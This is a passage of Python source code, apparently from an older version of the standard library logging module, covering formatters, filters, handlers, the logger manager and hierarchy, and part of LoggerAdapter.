= Template(self._fmt)\n\n def usesTime(self):\n fmt = self._fmt\n return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0\n\n def format(self, record):\n return self._tpl.substitute(**record.__dict__)\n\n_STYLES = {\n '%': PercentStyle,\n '{': StrFormatStyle,\n '$': StringTemplateStyle\n}\n\nclass Formatter(object):\n \"\"\"\n Formatter instances are used to convert a LogRecord to text.\n\n Formatters need to know how a LogRecord is constructed. They are\n responsible for converting a LogRecord to (usually) a string which can\n be interpreted by either a human or an external system. The base Formatter\n allows a formatting string to be specified. If none is supplied, the\n default value of \"%s(message)\" is used.\n\n The Formatter can be initialized with a format string which makes use of\n knowledge of the LogRecord attributes - e.g. the default value mentioned\n above makes use of the fact that the user's message and arguments are pre-\n formatted into a LogRecord's message attribute. Currently, the useful\n attributes in a LogRecord are described by:\n\n %(name)s Name of the logger (logging channel)\n %(levelno)s Numeric logging level for the message (DEBUG, INFO,\n WARNING, ERROR, CRITICAL)\n %(levelname)s Text logging level for the message (\"DEBUG\", \"INFO\",\n \"WARNING\", \"ERROR\", \"CRITICAL\")\n %(pathname)s Full pathname of the source file where the logging\n call was issued (if available)\n %(filename)s Filename portion of pathname\n %(module)s Module (name portion of filename)\n %(lineno)d Source line number where the logging call was issued\n (if available)\n %(funcName)s Function name\n %(created)f Time when the LogRecord was created (time.time()\n return value)\n %(asctime)s Textual time when the LogRecord was created\n %(msecs)d Millisecond portion of the creation time\n %(relativeCreated)d Time in milliseconds when the LogRecord was created,\n relative to the time the logging module was loaded\n (typically at application startup time)\n %(thread)d Thread ID (if available)\n %(threadName)s Thread name (if available)\n %(process)d Process ID (if available)\n %(message)s The result of record.getMessage(), computed just as\n the record is emitted\n \"\"\"\n\n converter = time.localtime\n\n def __init__(self, fmt=None, datefmt=None, style='%'):\n \"\"\"\n Initialize the formatter with specified format strings.\n\n Initialize the formatter either with the specified format string, or a\n default as described above. Allow for specialized date formatting with\n the optional datefmt argument (if omitted, you get the ISO8601 format).\n\n Use a style parameter of '%', '{' or '$' to specify that you want to\n use one of %-formatting, :meth:`str.format` (``{}``) formatting or\n :class:`string.Template` formatting in your format string.\n\n .. versionchanged: 3.2\n Added the ``style`` parameter.\n \"\"\"\n if style not in _STYLES:\n raise ValueError('Style must be one of: %s' % ','.join(\n _STYLES.keys()))\n self._style = _STYLES[style](fmt)\n self._fmt = self._style._fmt\n self.datefmt = datefmt\n\n default_time_format = '%Y-%m-%d %H:%M:%S'\n default_msec_format = '%s,%03d'\n\n def formatTime(self, record, datefmt=None):\n \"\"\"\n Return the creation time of the specified LogRecord as formatted text.\n\n This method should be called from format() by a formatter which\n wants to make use of a formatted time. This method can be overridden\n in formatters to provide for any specific requirement, but the\n basic behaviour is as follows: if datefmt (a string) is specified,\n it is used with time.strftime() to format the creation time of the\n record. Otherwise, the ISO8601 format is used. The resulting\n string is returned. This function uses a user-configurable function\n to convert the creation time to a tuple. By default, time.localtime()\n is used; to change this for a particular formatter instance, set the\n 'converter' attribute to a function with the same signature as\n time.localtime() or time.gmtime(). To change it for all formatters,\n for example if you want all logging times to be shown in GMT,\n set the 'converter' attribute in the Formatter class.\n \"\"\"\n ct = self.converter(record.created)\n if datefmt:\n s = time.strftime(datefmt, ct)\n else:\n t = time.strftime(self.default_time_format, ct)\n s = self.default_msec_format % (t, record.msecs)\n return s\n\n def formatException(self, ei):\n \"\"\"\n Format and return the specified exception information as a string.\n\n This default implementation just uses\n traceback.print_exception()\n \"\"\"\n sio = io.StringIO()\n tb = ei[2]\n # See issues #9427, #1553375. Commented out for now.\n #if getattr(self, 'fullstack', False):\n # traceback.print_stack(tb.tb_frame.f_back, file=sio)\n traceback.print_exception(ei[0], ei[1], tb, None, sio)\n s = sio.getvalue()\n sio.close()\n if s[-1:] == \"\\n\":\n s = s[:-1]\n return s\n\n def usesTime(self):\n \"\"\"\n Check if the format uses the creation time of the record.\n \"\"\"\n return self._style.usesTime()\n\n def formatMessage(self, record):\n return self._style.format(record)\n\n def formatStack(self, stack_info):\n \"\"\"\n This method is provided as an extension point for specialized\n formatting of stack information.\n\n The input data is a string as returned from a call to\n :func:`traceback.print_stack`, but with the last trailing newline\n removed.\n\n The base implementation just returns the value passed in.\n \"\"\"\n return stack_info\n\n def format(self, record):\n \"\"\"\n Format the specified record as text.\n\n The record's attribute dictionary is used as the operand to a\n string formatting operation which yields the returned string.\n Before formatting the dictionary, a couple of preparatory steps\n are carried out. The message attribute of the record is computed\n using LogRecord.getMessage(). If the formatting string uses the\n time (as determined by a call to usesTime(), formatTime() is\n called to format the event time. If there is exception information,\n it is formatted using formatException() and appended to the message.\n \"\"\"\n record.message = record.getMessage()\n if self.usesTime():\n record.asctime = self.formatTime(record, self.datefmt)\n s = self.formatMessage(record)\n if record.exc_info:\n # Cache the traceback text to avoid converting it multiple times\n # (it's constant anyway)\n if not record.exc_text:\n record.exc_text = self.formatException(record.exc_info)\n if record.exc_text:\n if s[-1:] != \"\\n\":\n s = s + \"\\n\"\n s = s + record.exc_text\n if record.stack_info:\n if s[-1:] != \"\\n\":\n s = s + \"\\n\"\n s = s + self.formatStack(record.stack_info)\n return s\n\n#\n# The default formatter to use when no other is specified\n#\n_defaultFormatter = Formatter()\n\nclass BufferingFormatter(object):\n \"\"\"\n A formatter suitable for formatting a number of records.\n \"\"\"\n def __init__(self, linefmt=None):\n \"\"\"\n Optionally specify a formatter which will be used to format each\n individual record.\n \"\"\"\n if linefmt:\n self.linefmt = linefmt\n else:\n self.linefmt = _defaultFormatter\n\n def formatHeader(self, records):\n \"\"\"\n Return the header string for the specified records.\n \"\"\"\n return \"\"\n\n def formatFooter(self, records):\n \"\"\"\n Return the footer string for the specified records.\n \"\"\"\n return \"\"\n\n def format(self, records):\n \"\"\"\n Format the specified records and return the result as a string.\n \"\"\"\n rv = \"\"\n if len(records) > 0:\n rv = rv + self.formatHeader(records)\n for record in records:\n rv = rv + self.linefmt.format(record)\n rv = rv + self.formatFooter(records)\n return rv\n\n#---------------------------------------------------------------------------\n# Filter classes and functions\n#---------------------------------------------------------------------------\n\nclass Filter(object):\n \"\"\"\n Filter instances are used to perform arbitrary filtering of LogRecords.\n\n Loggers and Handlers can optionally use Filter instances to filter\n records as desired. The base filter class only allows events which are\n below a certain point in the logger hierarchy. For example, a filter\n initialized with \"A.B\" will allow events logged by loggers \"A.B\",\n \"A.B.C\", \"A.B.C.D\", \"A.B.D\" etc. but not \"A.BB\", \"B.A.B\" etc. If\n initialized with the empty string, all events are passed.\n \"\"\"\n def __init__(self, name=''):\n \"\"\"\n Initialize a filter.\n\n Initialize with the name of the logger which, together with its\n children, will have its events allowed through the filter. If no\n name is specified, allow every event.\n \"\"\"\n self.name = name\n self.nlen = len(name)\n\n def filter(self, record):\n \"\"\"\n Determine if the specified record is to be logged.\n\n Is the specified record to be logged? Returns 0 for no, nonzero for\n yes. If deemed appropriate, the record may be modified in-place.\n \"\"\"\n if self.nlen == 0:\n return True\n elif self.name == record.name:\n return True\n elif record.name.find(self.name, 0, self.nlen) != 0:\n return False\n return (record.name[self.nlen] == \".\")\n\nclass Filterer(object):\n \"\"\"\n A base class for loggers and handlers which allows them to share\n common code.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize the list of filters to be an empty list.\n \"\"\"\n self.filters = []\n\n def addFilter(self, filter):\n \"\"\"\n Add the specified filter to this handler.\n \"\"\"\n if not (filter in self.filters):\n self.filters.append(filter)\n\n def removeFilter(self, filter):\n \"\"\"\n Remove the specified filter from this handler.\n \"\"\"\n if filter in self.filters:\n self.filters.remove(filter)\n\n def filter(self, record):\n \"\"\"\n Determine if a record is loggable by consulting all the filters.\n\n The default is to allow the record to be logged; any filter can veto\n this and the record is then dropped. Returns a zero value if a record\n is to be dropped, else non-zero.\n\n .. versionchanged: 3.2\n\n Allow filters to be just callables.\n \"\"\"\n rv = True\n for f in self.filters:\n if hasattr(f, 'filter'):\n result = f.filter(record)\n else:\n result = f(record) # assume callable - will raise if not\n if not result:\n rv = False\n break\n return rv\n\n#---------------------------------------------------------------------------\n# Handler classes and functions\n#---------------------------------------------------------------------------\n\n_handlers = weakref.WeakValueDictionary() #map of handler names to handlers\n_handlerList = [] # added to allow handlers to be removed in reverse of order initialized\n\ndef _removeHandlerRef(wr):\n \"\"\"\n Remove a handler reference from the internal cleanup list.\n \"\"\"\n # This function can be called during module teardown, when globals are\n # set to None. If _acquireLock is None, assume this is the case and do\n # nothing.\n if (_acquireLock is not None and _handlerList is not None and\n _releaseLock is not None):\n _acquireLock()\n try:\n if wr in _handlerList:\n _handlerList.remove(wr)\n finally:\n _releaseLock()\n\ndef _addHandlerRef(handler):\n \"\"\"\n Add a handler to the internal cleanup list using a weak reference.\n \"\"\"\n _acquireLock()\n try:\n _handlerList.append(weakref.ref(handler, _removeHandlerRef))\n finally:\n _releaseLock()\n\nclass Handler(Filterer):\n \"\"\"\n Handler instances dispatch logging events to specific destinations.\n\n The base handler class. Acts as a placeholder which defines the Handler\n interface. Handlers can optionally use Formatter instances to format\n records as desired. By default, no formatter is specified; in this case,\n the 'raw' message as determined by record.message is logged.\n \"\"\"\n def __init__(self, level=NOTSET):\n \"\"\"\n Initializes the instance - basically setting the formatter to None\n and the filter list to empty.\n \"\"\"\n Filterer.__init__(self)\n self._name = None\n self.level = _checkLevel(level)\n self.formatter = None\n # Add the handler to the global _handlerList (for cleanup on shutdown)\n _addHandlerRef(self)\n self.createLock()\n\n def get_name(self):\n return self._name\n\n def set_name(self, name):\n _acquireLock()\n try:\n if self._name in _handlers:\n del _handlers[self._name]\n self._name = name\n if name:\n _handlers[name] = self\n finally:\n _releaseLock()\n\n name = property(get_name, set_name)\n\n def createLock(self):\n \"\"\"\n Acquire a thread lock for serializing access to the underlying I/O.\n \"\"\"\n if threading:\n self.lock = threading.RLock()\n else: #pragma: no cover\n self.lock = None\n\n def acquire(self):\n \"\"\"\n Acquire the I/O thread lock.\n \"\"\"\n if self.lock:\n self.lock.acquire()\n\n def release(self):\n \"\"\"\n Release the I/O thread lock.\n \"\"\"\n if self.lock:\n self.lock.release()\n\n def setLevel(self, level):\n \"\"\"\n Set the logging level of this handler. level must be an int or a str.\n \"\"\"\n self.level = _checkLevel(level)\n\n def format(self, record):\n \"\"\"\n Format the specified record.\n\n If a formatter is set, use it. Otherwise, use the default formatter\n for the module.\n \"\"\"\n if self.formatter:\n fmt = self.formatter\n else:\n fmt = _defaultFormatter\n return fmt.format(record)\n\n def emit(self, record):\n \"\"\"\n Do whatever it takes to actually log the specified logging record.\n\n This version is intended to be implemented by subclasses and so\n raises a NotImplementedError.\n \"\"\"\n raise NotImplementedError('emit must be implemented '\n 'by Handler subclasses')\n\n def handle(self, record):\n \"\"\"\n Conditionally emit the specified logging record.\n\n Emission depends on filters which may have been added to the handler.\n Wrap the actual emission of the record with acquisition/release of\n the I/O thread lock. Returns whether the filter passed the record for\n emission.\n \"\"\"\n rv = self.filter(record)\n if rv:\n self.acquire()\n try:\n self.emit(record)\n finally:\n self.release()\n return rv\n\n def setFormatter(self, fmt):\n \"\"\"\n Set the formatter for this handler.\n \"\"\"\n self.formatter = fmt\n\n def flush(self):\n \"\"\"\n Ensure all logging output has been flushed.\n\n This version does nothing and is intended to be implemented by\n subclasses.\n \"\"\"\n pass\n\n def close(self):\n \"\"\"\n Tidy up any resources used by the handler.\n\n This version removes the handler from an internal map of handlers,\n _handlers, which is used for handler lookup by name. Subclasses\n should ensure that this gets called from overridden close()\n methods.\n \"\"\"\n #get the module data lock, as we're updating a shared structure.\n _acquireLock()\n try: #unlikely to raise an exception, but you never know...\n if self._name and self._name in _handlers:\n del _handlers[self._name]\n finally:\n _releaseLock()\n\n def handleError(self, record):\n \"\"\"\n Handle errors which occur during an emit() call.\n\n This method should be called from handlers when an exception is\n encountered during an emit() call. If raiseExceptions is false,\n exceptions get silently ignored. This is what is mostly wanted\n for a logging system - most users will not care about errors in\n the logging system, they are more interested in application errors.\n You could, however, replace this with a custom handler if you wish.\n The record which was being processed is passed in to this method.\n \"\"\"\n if raiseExceptions and sys.stderr: # see issue 13807\n ei = sys.exc_info()\n try:\n traceback.print_exception(ei[0], ei[1], ei[2],\n None, sys.stderr)\n sys.stderr.write('Logged from file %s, line %s\\n' % (\n record.filename, record.lineno))\n except IOError: #pragma: no cover\n pass # see issue 5971\n finally:\n del ei\n\nclass StreamHandler(Handler):\n \"\"\"\n A handler class which writes logging records, appropriately formatted,\n to a stream. Note that this class does not close the stream, as\n sys.stdout or sys.stderr may be used.\n \"\"\"\n\n terminator = '\\n'\n\n def __init__(self, stream=None):\n \"\"\"\n Initialize the handler.\n\n If stream is not specified, sys.stderr is used.\n \"\"\"\n Handler.__init__(self)\n if stream is None:\n stream = sys.stderr\n self.stream = stream\n\n def flush(self):\n \"\"\"\n Flushes the stream.\n \"\"\"\n self.acquire()\n try:\n if self.stream and hasattr(self.stream, \"flush\"):\n self.stream.flush()\n finally:\n self.release()\n\n def emit(self, record):\n \"\"\"\n Emit a record.\n\n If a formatter is specified, it is used to format the record.\n The record is then written to the stream with a trailing newline. If\n exception information is present, it is formatted using\n traceback.print_exception and appended to the stream. If the stream\n has an 'encoding' attribute, it is used to determine how to do the\n output to the stream.\n \"\"\"\n try:\n msg = self.format(record)\n stream = self.stream\n stream.write(msg)\n stream.write(self.terminator)\n self.flush()\n except (KeyboardInterrupt, SystemExit): #pragma: no cover\n raise\n except:\n self.handleError(record)\n\nclass FileHandler(StreamHandler):\n \"\"\"\n A handler class which writes formatted logging records to disk files.\n \"\"\"\n def __init__(self, filename, mode='a', encoding=None, delay=False):\n \"\"\"\n Open the specified file and use it as the stream for logging.\n \"\"\"\n #keep the absolute path, otherwise derived classes which use this\n #may come a cropper when the current directory changes\n self.baseFilename = os.path.abspath(filename)\n self.mode = mode\n self.encoding = encoding\n self.delay = delay\n if delay:\n #We don't open the stream, but we still need to call the\n #Handler constructor to set level, formatter, lock etc.\n Handler.__init__(self)\n self.stream = None\n else:\n StreamHandler.__init__(self, self._open())\n\n def close(self):\n \"\"\"\n Closes the stream.\n \"\"\"\n self.acquire()\n try:\n if self.stream:\n self.flush()\n if hasattr(self.stream, \"close\"):\n self.stream.close()\n StreamHandler.close(self)\n self.stream = None\n finally:\n self.release()\n\n def _open(self):\n \"\"\"\n Open the current base file with the (original) mode and encoding.\n Return the resulting stream.\n \"\"\"\n return open(self.baseFilename, self.mode, encoding=self.encoding)\n\n def emit(self, record):\n \"\"\"\n Emit a record.\n\n If the stream was not opened because 'delay' was specified in the\n constructor, open it before calling the superclass's emit.\n \"\"\"\n if self.stream is None:\n self.stream = self._open()\n StreamHandler.emit(self, record)\n\nclass _StderrHandler(StreamHandler):\n \"\"\"\n This class is like a StreamHandler using sys.stderr, but always uses\n whatever sys.stderr is currently set to rather than the value of\n sys.stderr at handler construction time.\n \"\"\"\n def __init__(self, level=NOTSET):\n \"\"\"\n Initialize the handler.\n \"\"\"\n Handler.__init__(self, level)\n\n @property\n def stream(self):\n return sys.stderr\n\n\n_defaultLastResort = _StderrHandler(WARNING)\nlastResort = _defaultLastResort\n\n#---------------------------------------------------------------------------\n# Manager classes and functions\n#---------------------------------------------------------------------------\n\nclass PlaceHolder(object):\n \"\"\"\n PlaceHolder instances are used in the Manager logger hierarchy to take\n the place of nodes for which no loggers have been defined. This class is\n intended for internal use only and not as part of the public API.\n \"\"\"\n def __init__(self, alogger):\n \"\"\"\n Initialize with the specified logger being a child of this placeholder.\n \"\"\"\n self.loggerMap = { alogger : None }\n\n def append(self, alogger):\n \"\"\"\n Add the specified logger as a child of this placeholder.\n \"\"\"\n if alogger not in self.loggerMap:\n self.loggerMap[alogger] = None\n\n#\n# Determine which class to use when instantiating loggers.\n#\n_loggerClass = None\n\ndef setLoggerClass(klass):\n \"\"\"\n Set the class to be used when instantiating a logger. The class should\n define __init__() such that only a name argument is required, and the\n __init__() should call Logger.__init__()\n \"\"\"\n if klass != Logger:\n if not issubclass(klass, Logger):\n raise TypeError(\"logger not derived from logging.Logger: \"\n + klass.__name__)\n global _loggerClass\n _loggerClass = klass\n\ndef getLoggerClass():\n \"\"\"\n Return the class to be used when instantiating a logger.\n \"\"\"\n\n return _loggerClass\n\nclass Manager(object):\n \"\"\"\n There is [under normal circumstances] just one Manager instance, which\n holds the hierarchy of loggers.\n \"\"\"\n def __init__(self, rootnode):\n \"\"\"\n Initialize the manager with the root node of the logger hierarchy.\n \"\"\"\n self.root = rootnode\n self.disable = 0\n self.emittedNoHandlerWarning = False\n self.loggerDict = {}\n self.loggerClass = None\n self.logRecordFactory = None\n\n def getLogger(self, name):\n \"\"\"\n Get a logger with the specified name (channel name), creating it\n if it doesn't yet exist. This name is a dot-separated hierarchical\n name, such as \"a\", \"a.b\", \"a.b.c\" or similar.\n\n If a PlaceHolder existed for the specified name [i.e. the logger\n didn't exist but a child of it did], replace it with the created\n logger and fix up the parent/child references which pointed to the\n placeholder to now point to the logger.\n \"\"\"\n rv = None\n if not isinstance(name, str):\n raise TypeError('A logger name must be a string')\n _acquireLock()\n try:\n if name in self.loggerDict:\n rv = self.loggerDict[name]\n if isinstance(rv, PlaceHolder):\n ph = rv\n rv = (self.loggerClass or _loggerClass)(name)\n rv.manager = self\n self.loggerDict[name] = rv\n self._fixupChildren(ph, rv)\n self._fixupParents(rv)\n else:\n rv = (self.loggerClass or _loggerClass)(name)\n rv.manager = self\n self.loggerDict[name] = rv\n self._fixupParents(rv)\n finally:\n _releaseLock()\n return rv\n\n def setLoggerClass(self, klass):\n \"\"\"\n Set the class to be used when instantiating a logger with this Manager.\n \"\"\"\n if klass != Logger:\n if not issubclass(klass, Logger):\n raise TypeError(\"logger not derived from logging.Logger: \"\n + klass.__name__)\n self.loggerClass = klass\n\n def setLogRecordFactory(self, factory):\n \"\"\"\n Set the factory to be used when instantiating a log record with this\n Manager.\n \"\"\"\n self.logRecordFactory = factory\n\n def _fixupParents(self, alogger):\n \"\"\"\n Ensure that there are either loggers or placeholders all the way\n from the specified logger to the root of the logger hierarchy.\n \"\"\"\n name = alogger.name\n i = name.rfind(\".\")\n rv = None\n while (i > 0) and not rv:\n substr = name[:i]\n if substr not in self.loggerDict:\n self.loggerDict[substr] = PlaceHolder(alogger)\n else:\n obj = self.loggerDict[substr]\n if isinstance(obj, Logger):\n rv = obj\n else:\n assert isinstance(obj, PlaceHolder)\n obj.append(alogger)\n i = name.rfind(\".\", 0, i - 1)\n if not rv:\n rv = self.root\n alogger.parent = rv\n\n def _fixupChildren(self, ph, alogger):\n \"\"\"\n Ensure that children of the placeholder ph are connected to the\n specified logger.\n \"\"\"\n name = alogger.name\n namelen = len(name)\n for c in ph.loggerMap.keys():\n #The if means ... if not c.parent.name.startswith(nm)\n if c.parent.name[:namelen] != name:\n alogger.parent = c.parent\n c.parent = alogger\n\n#---------------------------------------------------------------------------\n# Logger classes and functions\n#---------------------------------------------------------------------------\n\nclass Logger(Filterer):\n \"\"\"\n Instances of the Logger class represent a single logging channel. A\n \"logging channel\" indicates an area of an application. Exactly how an\n \"area\" is defined is up to the application developer. Since an\n application can have any number of areas, logging channels are identified\n by a unique string. Application areas can be nested (e.g. an area\n of \"input processing\" might include sub-areas \"read CSV files\", \"read\n XLS files\" and \"read Gnumeric files\"). To cater for this natural nesting,\n channel names are organized into a namespace hierarchy where levels are\n separated by periods, much like the Java or Python package namespace. So\n in the instance given above, channel names might be \"input\" for the upper\n level, and \"input.csv\", \"input.xls\" and \"input.gnu\" for the sub-levels.\n There is no arbitrary limit to the depth of nesting.\n \"\"\"\n def __init__(self, name, level=NOTSET):\n \"\"\"\n Initialize the logger with a name and an optional level.\n \"\"\"\n Filterer.__init__(self)\n self.name = name\n self.level = _checkLevel(level)\n self.parent = None\n self.propagate = True\n self.handlers = []\n self.disabled = False\n\n def setLevel(self, level):\n \"\"\"\n Set the logging level of this logger. level must be an int or a str.\n \"\"\"\n self.level = _checkLevel(level)\n\n def debug(self, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with severity 'DEBUG'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.debug(\"Houston, we have a %s\", \"thorny problem\", exc_info=1)\n \"\"\"\n if self.isEnabledFor(DEBUG):\n self._log(DEBUG, msg, args, **kwargs)\n\n def info(self, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with severity 'INFO'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.info(\"Houston, we have a %s\", \"interesting problem\", exc_info=1)\n \"\"\"\n if self.isEnabledFor(INFO):\n self._log(INFO, msg, args, **kwargs)\n\n def warning(self, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with severity 'WARNING'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.warning(\"Houston, we have a %s\", \"bit of a problem\", exc_info=1)\n \"\"\"\n if self.isEnabledFor(WARNING):\n self._log(WARNING, msg, args, **kwargs)\n\n def warn(self, msg, *args, **kwargs):\n warnings.warn(\"The 'warn' method is deprecated, \"\n \"use 'warning' instead\", DeprecationWarning, 2)\n self.warning(msg, *args, **kwargs)\n\n def error(self, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with severity 'ERROR'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.error(\"Houston, we have a %s\", \"major problem\", exc_info=1)\n \"\"\"\n if self.isEnabledFor(ERROR):\n self._log(ERROR, msg, args, **kwargs)\n\n def exception(self, msg, *args, **kwargs):\n \"\"\"\n Convenience method for logging an ERROR with exception information.\n \"\"\"\n kwargs['exc_info'] = True\n self.error(msg, *args, **kwargs)\n\n def critical(self, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with severity 'CRITICAL'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.critical(\"Houston, we have a %s\", \"major disaster\", exc_info=1)\n \"\"\"\n if self.isEnabledFor(CRITICAL):\n self._log(CRITICAL, msg, args, **kwargs)\n\n fatal = critical\n\n def log(self, level, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with the integer severity 'level'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.log(level, \"We have a %s\", \"mysterious problem\", exc_info=1)\n \"\"\"\n if not isinstance(level, int):\n if raiseExceptions:\n raise TypeError(\"level must be an integer\")\n else:\n return\n if self.isEnabledFor(level):\n self._log(level, msg, args, **kwargs)\n\n def findCaller(self, stack_info=False):\n \"\"\"\n Find the stack frame of the caller so that we can note the source\n file name, line number and function name.\n \"\"\"\n f = currentframe()\n #On some versions of IronPython, currentframe() returns None if\n #IronPython isn't run with -X:Frames.\n if f is not None:\n f = f.f_back\n rv = \"(unknown file)\", 0, \"(unknown function)\", None\n while hasattr(f, \"f_code\"):\n co = f.f_code\n filename = os.path.normcase(co.co_filename)\n if filename == _srcfile:\n f = f.f_back\n continue\n sinfo = None\n if stack_info:\n sio = io.StringIO()\n sio.write('Stack (most recent call last):\\n')\n traceback.print_stack(f, file=sio)\n sinfo = sio.getvalue()\n if sinfo[-1] == '\\n':\n sinfo = sinfo[:-1]\n sio.close()\n rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)\n break\n return rv\n\n def makeRecord(self, name, level, fn, lno, msg, args, exc_info,\n func=None, extra=None, sinfo=None):\n \"\"\"\n A factory method which can be overridden in subclasses to create\n specialized LogRecords.\n \"\"\"\n rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,\n sinfo)\n if extra is not None:\n for key in extra:\n if (key in [\"message\", \"asctime\"]) or (key in rv.__dict__):\n raise KeyError(\"Attempt to overwrite %r in LogRecord\" % key)\n rv.__dict__[key] = extra[key]\n return rv\n\n def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):\n \"\"\"\n Low-level logging routine which creates a LogRecord and then calls\n all the handlers of this logger to handle the record.\n \"\"\"\n sinfo = None\n if _srcfile:\n #IronPython doesn't track Python frames, so findCaller raises an\n #exception on some versions of IronPython. We trap it here so that\n #IronPython can use logging.\n try:\n fn, lno, func, sinfo = self.findCaller(stack_info)\n except ValueError: # pragma: no cover\n fn, lno, func = \"(unknown file)\", 0, \"(unknown function)\"\n else: # pragma: no cover\n fn, lno, func = \"(unknown file)\", 0, \"(unknown function)\"\n if exc_info:\n if not isinstance(exc_info, tuple):\n exc_info = sys.exc_info()\n record = self.makeRecord(self.name, level, fn, lno, msg, args,\n exc_info, func, extra, sinfo)\n self.handle(record)\n\n def handle(self, record):\n \"\"\"\n Call the handlers for the specified record.\n\n This method is used for unpickled records received from a socket, as\n well as those created locally. Logger-level filtering is applied.\n \"\"\"\n if (not self.disabled) and self.filter(record):\n self.callHandlers(record)\n\n def addHandler(self, hdlr):\n \"\"\"\n Add the specified handler to this logger.\n \"\"\"\n _acquireLock()\n try:\n if not (hdlr in self.handlers):\n self.handlers.append(hdlr)\n finally:\n _releaseLock()\n\n def removeHandler(self, hdlr):\n \"\"\"\n Remove the specified handler from this logger.\n \"\"\"\n _acquireLock()\n try:\n if hdlr in self.handlers:\n self.handlers.remove(hdlr)\n finally:\n _releaseLock()\n\n def hasHandlers(self):\n \"\"\"\n See if this logger has any handlers configured.\n\n Loop through all handlers for this logger and its parents in the\n logger hierarchy. Return True if a handler was found, else False.\n Stop searching up the hierarchy whenever a logger with the \"propagate\"\n attribute set to zero is found - that will be the last logger which\n is checked for the existence of handlers.\n \"\"\"\n c = self\n rv = False\n while c:\n if c.handlers:\n rv = True\n break\n if not c.propagate:\n break\n else:\n c = c.parent\n return rv\n\n def callHandlers(self, record):\n \"\"\"\n Pass a record to all relevant handlers.\n\n Loop through all handlers for this logger and its parents in the\n logger hierarchy. If no handler was found, output a one-off error\n message to sys.stderr. Stop searching up the hierarchy whenever a\n logger with the \"propagate\" attribute set to zero is found - that\n will be the last logger whose handlers are called.\n \"\"\"\n c = self\n found = 0\n while c:\n for hdlr in c.handlers:\n found = found + 1\n if record.levelno >= hdlr.level:\n hdlr.handle(record)\n if not c.propagate:\n c = None #break out\n else:\n c = c.parent\n if (found == 0):\n if lastResort:\n if record.levelno >= lastResort.level:\n lastResort.handle(record)\n elif raiseExceptions and not self.manager.emittedNoHandlerWarning:\n sys.stderr.write(\"No handlers could be found for logger\"\n \" \\\"%s\\\"\\n\" % self.name)\n self.manager.emittedNoHandlerWarning = True\n\n def getEffectiveLevel(self):\n \"\"\"\n Get the effective level for this logger.\n\n Loop through this logger and its parents in the logger hierarchy,\n looking for a non-zero logging level. Return the first one found.\n \"\"\"\n logger = self\n while logger:\n if logger.level:\n return logger.level\n logger = logger.parent\n return NOTSET\n\n def isEnabledFor(self, level):\n \"\"\"\n Is this logger enabled for level 'level'?\n \"\"\"\n if self.manager.disable >= level:\n return False\n return level >= self.getEffectiveLevel()\n\n def getChild(self, suffix):\n \"\"\"\n Get a logger which is a descendant to this one.\n\n This is a convenience method, such that\n\n logging.getLogger('abc').getChild('def.ghi')\n\n is the same as\n\n logging.getLogger('abc.def.ghi')\n\n It's useful, for example, when the parent logger is named using\n __name__ rather than a literal string.\n \"\"\"\n if self.root is not self:\n suffix = '.'.join((self.name, suffix))\n return self.manager.getLogger(suffix)\n\nclass RootLogger(Logger):\n \"\"\"\n A root logger is not that different to any other logger, except that\n it must have a logging level and there is only one instance of it in\n the hierarchy.\n \"\"\"\n def __init__(self, level):\n \"\"\"\n Initialize the logger with the name \"root\".\n \"\"\"\n Logger.__init__(self, \"root\", level)\n\n_loggerClass = Logger\n\nclass LoggerAdapter(object):\n \"\"\"\n An adapter for loggers which makes it easier to specify contextual\n information in logging output.\n \"\"\"\n\n def __init__(self, logger, extra):\n \"\"\"\n Initialize the adapter with a logger and a dict-like object which\n provides contextual information. This constructor signature allows\n easy stacking of LoggerAdapters, if so desired.\n\n You can effectively pass keyword arguments as shown in the\n following example:\n\n adapter = LoggerAdapter(someLogger, dict(p1=v1, p2=\"v2\"))\n \"\"\"\n self.logger = logger\n self.extra = extra\n\n def process(self, msg, kwargs):\n \"\"\"\n Process the logging message and keyword arguments passed in to\n a logging call to insert contextual information. You can either\n manipulate the message itself, the keyword args or both. Return\n the message and kwargs modified (or not) to suit your needs.\n\n Normally, you'll only need to override this one method in a\n LoggerAdapter subclass for your specific needs.\n \"\"\"\n kwargs[\"extra\"] = self.extra\n return msg, kwargs\n\n #\n # Boilerplate convenience methods\n #\n def debug(self, msg, *args, **kwargs):\n \"\"\"\n Delegate a debug call to the underlying logger.\n \"\"\"\n self.log(DEBUG, msg, *args, **kwargs)\n\n def info(self, msg, *args, **kwargs):\n \"\"\"\n Delegate an info call to the underlying logger.\n \"\"\"\n self.log(INFO, msg, *args, **kwargs)\n\n def warning(self, msg, *args, **kwargs):\n \"\"\"\n Delegate a warning call to the underlying logger.\n \"\"\"\n self.log(WARNING, msg, *args, **kwargs)\n\n def warn(self, msg, *args, **kwargs):\n warnings.warn(\"The 'warn' method is deprecated, \"\n \"use 'warning' instead\", DeprecationWarning, 2)\n self.warning(msg, *args, **kwargs)\n\n def error(self, msg, *args, **kwargs):\n \"\"\"\n Delegate an error call to the underlying logger.\n \"\"\"\n self.log(ERROR, msg, *args, **kwargs)\n\n def exception(self, msg, *args, **kwargs):\n \"\"\"\n Delegate an exception call to the underlying logger.\n \"\"\"\n kwargs[\"exc_info\"] = True\n self.log(ERROR, msg, *args, **kwargs)\n\n def critical(self, msg, *args, **kwargs):\n \"\"\"\n Delegate a critical call to the underlying logger.\n \"\"\"\n self.log(CRITICAL, msg, *args, **kwargs)\n\n def log(self, level, msg, *args, **kwargs):\n \"\"\"\n Delegate a log call to the underlying logger, after adding\n contextual information from this adapter instance.\n \"\"\"\n if 